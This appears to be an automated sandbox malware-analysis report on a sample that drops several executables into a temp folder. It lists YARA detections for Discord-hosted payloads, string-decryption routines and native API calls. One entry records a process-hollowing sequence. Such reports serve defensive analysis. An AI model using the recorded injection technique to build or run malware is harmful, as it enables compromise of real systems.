Uses 32bit PE files
Source: SkB6zJ6H3N.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 28.0.EDD.exe.810000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 28.0.EDD.exe.810000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 28.0.EDD.exe.810000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.5D4.exe.3b0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.5D4.exe.3b0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.319A.exe.d50000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.319A.exe.d50000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 28.0.EDD.exe.810000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.319A.exe.d50000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.5D4.exe.3b0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.319A.exe.d50000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.5D4.exe.3b0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\EDD.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\319A.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\8746.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\5D4.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\89D7.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: String function: 0041D0F0 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: String function: 004212D0 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: String function: 6A96D08C appears 41 times
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: String function: 6A91B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: String function: 6A9A5720 appears 76 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_0040185B Sleep,NtTerminateProcess, 4_2_0040185B
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_00401866 Sleep,NtTerminateProcess, 4_2_00401866
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_0040187A Sleep,NtTerminateProcess, 4_2_0040187A
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_0040163B NtMapViewOfSection, 4_2_0040163B
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_004018D3 NtTerminateProcess, 4_2_004018D3
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_00401884 Sleep,NtTerminateProcess, 4_2_00401884
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_00401888 NtTerminateProcess, 4_2_00401888
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_0040156A NtMapViewOfSection, 4_2_0040156A
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 4_2_004015DB
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_2_004017EA Sleep,NtTerminateProcess, 4_2_004017EA
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_1_0040156A NtMapViewOfSection, 4_1_0040156A
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 4_1_004015DB
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 4_1_0040163B NtMapViewOfSection, 4_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_0040185B Sleep,NtTerminateProcess, 20_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_00401866 Sleep,NtTerminateProcess, 20_2_00401866
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_0040187A Sleep,NtTerminateProcess, 20_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_0040163B NtMapViewOfSection, 20_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_004018D3 NtTerminateProcess, 20_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_00401884 Sleep,NtTerminateProcess, 20_2_00401884
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_00401888 NtTerminateProcess, 20_2_00401888
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_0040156A NtMapViewOfSection, 20_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 20_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 20_2_004017EA Sleep,NtTerminateProcess, 20_2_004017EA
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_02C70110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 22_2_02C70110
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_0040185B Sleep,NtTerminateProcess, 26_2_0040185B
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_00401866 Sleep,NtTerminateProcess, 26_2_00401866
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_0040187A Sleep,NtTerminateProcess, 26_2_0040187A
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_0040163B NtMapViewOfSection, 26_2_0040163B
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_004018D3 NtTerminateProcess, 26_2_004018D3
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_00401884 Sleep,NtTerminateProcess, 26_2_00401884
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_00401888 NtTerminateProcess, 26_2_00401888
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_0040156A NtMapViewOfSection, 26_2_0040156A
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 26_2_004015DB
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_2_004017EA Sleep,NtTerminateProcess, 26_2_004017EA
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_1_0040156A NtMapViewOfSection, 26_1_0040156A
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 26_1_004015DB
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_1_0040163B NtMapViewOfSection, 26_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_0040181C Sleep,NtTerminateProcess, 29_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402406 NtEnumerateKey, 29_2_00402406
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00401F25 NtQuerySystemInformation, 29_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00401828 Sleep,NtTerminateProcess, 29_2_00401828
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402431 NtEnumerateKey, 29_2_00402431
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_004017DA Sleep,NtTerminateProcess, 29_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_004017F8 NtTerminateProcess, 29_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_0040209A NtQuerySystemInformation, 29_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_004017A3 Sleep,NtTerminateProcess, 29_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9598C0 ZwDuplicateObject,LdrInitializeThunk, 29_2_6A9598C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959820 ZwEnumerateKey,LdrInitializeThunk, 29_2_6A959820
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959860 ZwQuerySystemInformation,LdrInitializeThunk, 29_2_6A959860
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9599A0 ZwCreateSection,LdrInitializeThunk, 29_2_6A9599A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959600 ZwOpenKey,LdrInitializeThunk, 29_2_6A959600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95967A NtQueryInformationProcess,LdrInitializeThunk, 29_2_6A95967A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959660 ZwAllocateVirtualMemory,LdrInitializeThunk, 29_2_6A959660
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959780 ZwMapViewOfSection,LdrInitializeThunk, 29_2_6A959780
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 29_2_6A94D294
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AA90 ZwQuerySystemInformationEx, 29_2_6A95AA90
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 29_2_6A91429E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 29_2_6A932280
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B280 ZwWow64DebuggerCall, 29_2_6A95B280
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 29_2_6A94DA88
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959AB0 ZwWaitForMultipleObjects, 29_2_6A959AB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94E2BB ZwWaitForAlertByThreadId, 29_2_6A94E2BB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A911AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 29_2_6A911AA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91BAA0 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlpLoadMachineUIByPolicy,ZwClose, 29_2_6A91BAA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A945AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 29_2_6A945AA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9152A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 29_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 29_2_6A93FAD0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8ADD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1AD6 ZwFreeVirtualMemory, 29_2_6A9A1AD6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AAC0 ZwQueryWnfStateNameInformation, 29_2_6A95AAC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AAE0 ZwRaiseException, 29_2_6A95AAE0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959AE0 ZwTraceEvent, 29_2_6A959AE0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 29_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E216 RtlInitUnicodeString,ZwOpenKey,ZwEnumerateKey,ZwClose, 29_2_6A91E216
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 29_2_6A9E8214
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959A00 ZwProtectVirtualMemory, 29_2_6A959A00
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 29_2_6A94B230
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959A30 ZwTerminateThread, 29_2_6A959A30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A918239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 29_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 29_2_6A914A20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A4A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose, 29_2_6A9A4A28
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AA20 ZwQuerySecurityAttributesToken, 29_2_6A95AA20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 29_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959A50 ZwCreateFile, 29_2_6A959A50
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 29_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 29_2_6A9A1242
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8A62
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 29_2_6A912B93
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A390 ZwGetCachedSigningLevel, 29_2_6A95A390
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 29_2_6A94939F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9D138A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E9BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E9BBE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8BB6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A3A0 ZwGetCompleteWnfStateSubscription, 29_2_6A95A3A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9D1BA8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 29_2_6A944BAD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 29_2_6A912BC2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959BF0 ZwAlertThreadByThreadId, 29_2_6A959BF0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9123F6 ZwClose,RtlFreeHeap, 29_2_6A9123F6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 29_2_6A92A3E0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9D131B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 29_2_6A914B00
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A945306 ZwReleaseKeyedEvent, 29_2_6A945306
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959B00 ZwSetValueKey, 29_2_6A959B00
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919335 ZwClose,ZwClose, 29_2_6A919335
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8B58
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B48 ZwClose,ZwClose, 29_2_6A943B48
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AB70 ZwReleaseWorkerFactoryWorker, 29_2_6A95AB70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 29_2_6A9A8372
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 29_2_6A943B7A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912B7E ZwSetInformationThread,ZwClose, 29_2_6A912B7E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AB60 ZwReleaseKeyedEvent, 29_2_6A95AB60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 29_2_6A9C6369
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A926B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 29_2_6A926B6B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A997365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 29_2_6A997365
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 29_2_6A9A6365
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 29_2_6A93E090
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A890 ZwQueryDebugFilterState, 29_2_6A95A890
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959890 ZwFsControlFile, 29_2_6A959890
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 29_2_6A913880
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection, 29_2_6A94A080
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95108B ZwClose, 29_2_6A95108B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B0B0 ZwTraceControl, 29_2_6A95B0B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 29_2_6A94F0BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9418B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 29_2_6A9418B9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93F0AE ZwSetInformationWorkerFactory, 29_2_6A93F0AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C60A2 ZwQueryInformationFile, 29_2_6A9C60A2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9510D7 ZwOpenKey,ZwCreateKey, 29_2_6A9510D7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9598D0 ZwQueryAttributesFile, 29_2_6A9598D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A0D0 ZwCreateTimer2, 29_2_6A95A0D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9170C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 29_2_6A9170C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9500C2 ZwAlertThreadByThreadId, 29_2_6A9500C2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 29_2_6A91B8F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9140FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 29_2_6A9140FD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C60E9 ZwOpenKey,ZwClose,ZwClose, 29_2_6A9C60E9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CE0E9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap, 29_2_6A9CE0E9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 29_2_6A9EF019
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 29_2_6A91F018
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959830 ZwOpenFile, 29_2_6A959830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 29_2_6A944020
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 29_2_6A915050
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959850 ZwQueryDirectoryFile, 29_2_6A959850
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8858 ZwAlertThreadByThreadId, 29_2_6A9E8858
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959840 ZwDelayExecution, 29_2_6A959840
